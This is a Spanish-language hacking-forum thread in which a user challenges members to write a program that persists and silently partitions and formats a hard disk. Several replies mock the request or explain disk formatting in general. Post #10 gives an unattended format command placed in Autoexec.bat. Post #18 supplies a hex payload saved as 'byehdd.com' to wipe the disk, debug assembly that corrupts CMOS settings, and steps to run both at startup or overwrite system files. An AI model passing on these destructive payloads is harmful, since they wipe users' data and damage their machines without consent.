Resultados 1 al 19 de 19

Tema: Reto .BAT

  1. #1 Reto .BAT 
    Iniciado
    Fecha de ingreso
    Jul 2006
    Mensajes
    11
    Descargas
    0
    Uploads
    0
    Hola...por aqui no veo ningun programa .bat,

    Les tengo un reto a los mejores programadores del foro...

    1.- Deberan crear o modificar los comandos diskpart o format
    2.- Deberan crear un programa que primero se guarde en el disco duro
    3.- Dicho programa deberá de cargar al reiniciar el PC en memoria Virtual.
    4.- Deberá de ser capaz de particionar y formatear el H.D. sin preguntarle nada al usuario
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Mensajes
    538
    Descargas
    3
    Uploads
    0
    XDDD, no tienes muy claro lo que es un .bat, no?
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Feb 2004
    Ubicación
    Valencia
    Mensajes
    312
    Descargas
    0
    Uploads
    0
    Cita Iniciado por tux
    Hola...por aqui no veo ningun programa .bat,

    Les tengo un reto a los mejores programadores del foro...

    1.- Deberan crear o modificar los comandos diskpart o format
    2.- Deberan crear un programa que primero se guarde en el disco duro
    3.- Dicho programa deberá de cargar al reiniciar el PC en memoria Virtual.
    4.- Deberá de ser capaz de particionar y formatear el H.D. sin preguntarle nada al usuario
    Y luego, te lo subimos para que lo uses? o simplemente para que nos digas si esta bien? jijiji
    Normas de Hackhispano


    El olvido es el peor error que puede cometerse, pero es la mejor solución a muchos de los males
    Citar  
     

  4. #4  
    Moderador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Never mind that
    Mensajes
    979
    Descargas
    6
    Uploads
    0
    TUX ¿qué lo pongan a tu nombre o ya lo modificas tú? XD

    Te propongo un reto, seguro que te interesa:
    http://www.wikilearning.com/como_hag...wkccp-92-3.htm
    Citar  
     

  5. #5  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    Yo tengo otro reto:
    Crear un bat que haga las siguientes cosas:
    1. Lave los platos.
    2. Ponga la lavadora y tienda la ropa.
    3. Planche la ropa.
    4. Tenga el plato de comida en la mesa cuando llegue del trabajo.

    Este es mas facil,
    Por cierto, es curioso cuando a un alumno deprogramacion le dictas una cosa asi y tarda 2 minutos en darse cuenta que te estas quedando con el jiji XDD
    http://www.project-longinus.es
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Feb 2004
    Ubicación
    Valencia
    Mensajes
    312
    Descargas
    0
    Uploads
    0
    De todas formas, si que es posible lo que pide no?

    1.- Deberan crear o modificar los comandos diskpart o format (De este ni idea, lo veo imposible con BATCH hacer eso)
    2.- Deberan crear un programa que primero se guarde en el disco duro (Si)
    3.- Dicho programa deberá de cargar al reiniciar el PC (Si)
    4.- Deberá de ser capaz de formatear el H.D. sin preguntarle nada al usuario (Si)
    (bueno lo de no preguntarle nada, no me he metido para averiguarlo, pero yo creo que si que debe de haber alguna opción)

    No es tan difícil, lee tutoriales y practica.

    Lo que pide smaug_ ya es más para programadores avanzados, pero tranquilo, que en un futuro, veras como te toca hacerle algún Script a tu ChaChaRobot.
    Normas de Hackhispano


    El olvido es el peor error que puede cometerse, pero es la mejor solución a muchos de los males
    Citar  
     

  7. #7  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    format /q
    Formateo rapido, el sin preguntarle nada... creo que en ms-dos 6.0 habia una opcion para asumir Y a las preguntas, como el -y de apt-get :P
    Pero, como los comandos para el cmd son diferentes... vete tu a saber, un vistazo por encima, no descubro nada sobre eso :S
    http://www.project-longinus.es
    Citar  
     

  8. #8  
    Avanzado
    Fecha de ingreso
    Feb 2004
    Ubicación
    Valencia
    Mensajes
    312
    Descargas
    0
    Uploads
    0
    No sabía eso de asumir Y en la versión 6.0

    De todas formas Tux, creo que te estamos ayudando más de lo que esperabamos, ahora te toca a ti avanzar. Suerte!
    Normas de Hackhispano


    El olvido es el peor error que puede cometerse, pero es la mejor solución a muchos de los males
    Citar  
     

  9. #9  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Mensajes
    538
    Descargas
    3
    Uploads
    0
    lo del format, es verdad que había una opcion para que no pregunte.... pero, suponiendo que corre güindous, este no deja formatear la particion donde esté instalado. Lo del programa residente en memoria..... se puede, pero no por BAT

    Salu2
    Citar  
     

  10. #10  
    Avanzado
    Fecha de ingreso
    Mar 2006
    Ubicación
    Cybersiberia Profesion: Ricotero a Full
    Mensajes
    568
    Descargas
    0
    Uploads
    0
    Cita Iniciado por smaug_
    format /q
    Formateo rapido, el sin preguntarle nada... creo que en ms-dos 6.0 habia una opcion para asumir Y a las preguntas, como el -y de apt-get :P
    Pero, como los comandos para el cmd son diferentes... vete tu a saber, un vistazo por encima, no descubro nada sobre eso :S
    el comando correcto para que formatee el disco sin preguntar es agregar:

    format c: /q / autotest
    c: la unidad a formatiar
    /q = un formato rapido
    autotest = sin preguntar

    Nota lo probe poniendolo en el Autoexec.bat en mi windows 98 y me limo el HD
    (NO HAGAN ESTAS COSAS EN SUS CASAS)
    Citar  
     

  11. #11  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Cita Iniciado por SanLeviaThan
    Nota lo probe poniendolo en el Autoexec.bat en mi windows 98 y me limo el HD
    (NO HAGAN ESTAS COSAS EN SUS CASAS)
    ................ xD ..............

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  12. #12  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    Pero en xp no funciona
    Código:
    C:\Documents and Settings\Smaug>format e: /q /autotest
    Parámetro no válido: /autotest
    http://www.project-longinus.es
    Citar  
     

  13. #13  
    Avanzado
    Fecha de ingreso
    Mar 2006
    Ubicación
    Cybersiberia Profesion: Ricotero a Full
    Mensajes
    568
    Descargas
    0
    Uploads
    0
    Cita Iniciado por smaug_
    Pero en xp no funciona
    Código:
    C:\Documents and Settings\Smaug>format e: /q /autotest
    Parámetro no válido: /autotest
    Eso si en Xp no funciona por el echo que es NT y trae su propio S.O.

    Saludos
    Citar  
     

  14. #14  
    Iniciado
    Fecha de ingreso
    Jul 2006
    Mensajes
    11
    Descargas
    0
    Uploads
    0
    Que decepción, por lo visto en esta sección no hay nada y mucho menos nadie con programación avanzada...

    Ya que nadie de ustedes es capaz de implementar o duplicar a los comandos disckpart o format, para que posteriormente sean invocados; jj

    Una pregunta; alguno de ustedes tiene una remota idea de cómo trabaja un software para formatear...jejejejejej.....creo que ni idea tienen...
    Citar  
     

  15. #15  
    Avanzado
    Fecha de ingreso
    Mar 2006
    Ubicación
    Cybersiberia Profesion: Ricotero a Full
    Mensajes
    568
    Descargas
    0
    Uploads
    0
    Amigo, me parece que te estas yendo un poquito.....
    No es por nada pero a la gente de HH no le gustan esas respuestas.....
    Y no es que no sepamos como trabaja un soft o no sepamos programar. Lo que no se puede soportar gente que pide cosas incoherentes y sin sentido.....

    Saludos AMIGO!!!!!!!!!
    Citar  
     

  16. #16  
    Iniciado
    Fecha de ingreso
    Jul 2006
    Mensajes
    11
    Descargas
    0
    Uploads
    0
    La Mente es el ente mas poderoso del univeros, y para la mente todo tiene sentido...

    Alberth Eintein...
    Citar  
     

  17. #17  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Esto es un foro tux, no tu centro particular de soluciones. Si sabes más te animo a que compartas tus brillantes conocimientos con el resto del foro. De lo contrario no te dediques a faltar porque te caerá un ban, y eso amigo si que te dará sentido.

    Un saludo.
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  18. #18  
    Iniciado
    Fecha de ingreso
    Aug 2006
    Ubicación
    Bs As
    Mensajes
    39
    Descargas
    0
    Uploads
    0
    Si se copian estos numeros en un editor hexadecimal
    B013CD1033C0BFB001B9007DF3ABBAC803EE42FEC980 FB3C730580C304EB0880FF3C730380C7048AC3EE8AC7 EE32C0EEE2E3B1C88106AC01E9628006AC01628116AE 011936A1AE0133D2BB4001F7F38BF2FE8C707DE2DDBE F102BFB17EB162BA3E018A9CC0FE8A44FF03D88A4401 03D88A84400103D8C1EB02881D46474A75E246464747 E2D9BEB27EBFB201B97E3E5157F3A55E6800A007BF02 7D59F3A51E07B401CD16748CB80300CD10C3
    y se guarda en un archivo como byehdd.com
    adios al Disco rigido.
    Para referencia http://mirror.href.com/thestarman/asm/fire/Fire.html

    o si se tiene un award o ami bios las instrucciones para el debug son

    MOV DX,70
    MOV AL,10
    OUT DX,AL
    MOV DX,71
    MOV AL,01
    OUT DX,AL

    guardar como delcmos.com y ponerlo en el autoexec.bat o en el autoexec.nt
    y adios al cmos, a reconfigurarlo de nuevo.

    o usa el win32asm o el debug y guarda el archivo como io.sys o msdos.sys o en el autoexec.bat borra todo y ponele el nombre de tu programa.com

    algo de esto era lo que querias tux ?, disculpen a tux solo que se expresa medio delirante, jua,jua.
    Citar  
     

  19. #19  
    Moderador HH
    Fecha de ingreso
    Mar 2003
    Ubicación
    Galiza
    Mensajes
    3.918
    Descargas
    8
    Uploads
    1
    Yo tengo otro reto:
    Crear un bat que haga las siguientes cosas:
    1. Lave los platos.
    2. Ponga la lavadora y tienda la ropa.
    3. Planche la ropa.
    4. Tenga el plato de comida en la mesa cuando llegue del trabajo.
    Yo tengo uno, y con muchas más funciones, mi madre.

    Que decepción, por lo visto en esta sección no hay nada y mucho menos nadie con programación avanzada...

    Ya que nadie de ustedes es capaz de implementar o duplicar a los comandos disckpart o format, para que posteriormente sean invocados; jj

    Una pregunta; alguno de ustedes tiene una remota idea de cómo trabaja un software para formatear...jejejejejej.....creo que ni idea tienen...
    Mira chavalin, como tu reto es algo tan sencillo ni me molesto, solo te digo que lo que tu buscas se llama Partition Magic.

    En cuanto a como funciona un software para formatear, lo que hace es preparar la partición del HD que tu le indicas para poder se utizada, pero a mi por lo menos me resulta un poco complicado explicar el proceso además solo lo se teóricamente, en la práctica nunca hice un programa de ese estilo. Además depende del sistema de archivos, ya que no es lo mismo un sistema de archivos jerarquito o plano, de asignación continua, mediante listas enlazadas o mediante un mapa de bits, ..., incluso es es importante la planificación de acceso, no es lo mismo una planificación de acceso FCFS que una SCAN ... dependiendo de se va a utilizar esa partición, que tamañano tiene, ... , tienes que tener un programa de format distinto o por lo menos que pueda hacer formateos especificicos para cada tipo de partición. Hay libros enteros sobre esa temática.
    Aun por encima en el mundo Wintel los sistemas de ficheros utilizados son el VFAT, el FAT32, el NTFS y el ISO9660 (este no se si puse bien el número). Menos del último, que es un standar internacional, los demás son implementaciones de MS, para las que no hay demasiada información, más haya de la teórica, especialmente del NTFS que es el que utilizan por defecto los NT (tanto el 4, como en 5 -alias Windows 2000- y el 5.1 -alias Windows XP). Del FAt32 si que hay mucha más info, incluso hay implementaciones libres de lo que tu quieres.

    Si estas muy interesado en el codigo fuente de una aplicación format para la plataforma PC te recomiendo que te pases por el site del SO FreeDOS (o alguna de sus variantes como FreeDOS32) y pidas el código fuente.
    http://www.freedos.org

    Por otro lado, hasta ahora estoy refieriendome al formateo en alto nivel, pero existe el formateo a bajo nivel, que es el que hacen los fabricantes del HD antes de enviarlo a las tiendas. Antiguamamente muchas BIOS integraban la función de formatear un HD a bajo nivel, sobre todo porque era una forma de solucionar muchos problemas de los HD, que se solucionaban con un buen formateo a bajo nivel. Hoy en día es muy dificil, pero si te empeñas te envio envio en código ASM para un format a bajo nivel.

    Un Saludo
    He conocido muchos dioses. Quien niegue su existencia está tan ciego como el que confía en ellos con una fe desmesurada. Robert E. Howard
    La suerte ayuda a la mente preparada.
    Citar  
     

Temas similares

  1. Reto esteganografia
    Por crass en el foro HACK HiSPANO
    Respuestas: 22
    Último mensaje: 07-10-2010, 22:41
  2. Reto de encriptación
    Por Sefiroth en el foro GENERAL
    Respuestas: 13
    Último mensaje: 02-09-2006, 17:48
  3. Un reto
    Por Delas en el foro JUEGOS
    Respuestas: 3
    Último mensaje: 24-06-2006, 16:51
  4. un Reto....
    Por NeoGenessis en el foro INGENIERIA INVERSA
    Respuestas: 6
    Último mensaje: 18-02-2002, 19:41

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •